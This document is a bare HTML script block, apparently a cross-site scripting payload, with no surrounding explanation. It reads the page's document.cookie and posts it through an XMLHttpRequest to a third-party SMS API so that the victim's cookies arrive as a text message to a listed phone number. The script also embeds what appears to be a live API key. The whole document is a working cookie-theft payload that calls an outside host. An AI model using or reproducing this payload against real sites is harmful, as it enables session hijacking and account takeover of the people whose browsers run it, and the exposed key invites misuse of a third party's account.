<script>
var data = "to=%2B14388271972&message=" + JSON.stringify(document.cookie);

var xhr = new XMLHttpRequest();
xhr.withCredentials = true;

xhr.addEventListener("readystatechange", function () {
	if (this.readyState === this.DONE) {
		console.log(this.responseText);
	}
});

xhr.open("POST", "https://iddogino-simplesms-v1.p.rapidapi.com/RapidSMS_main");
xhr.setRequestHeader("x-rapidapi-host", "iddogino-simplesms-v1.p.rapidapi.com");
xhr.setRequestHeader("x-rapidapi-key", "1f579c04a8mshbd1996662fe96f8p1caab4jsn6cfdfc865f6e");
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded");

xhr.send(data);


</script>
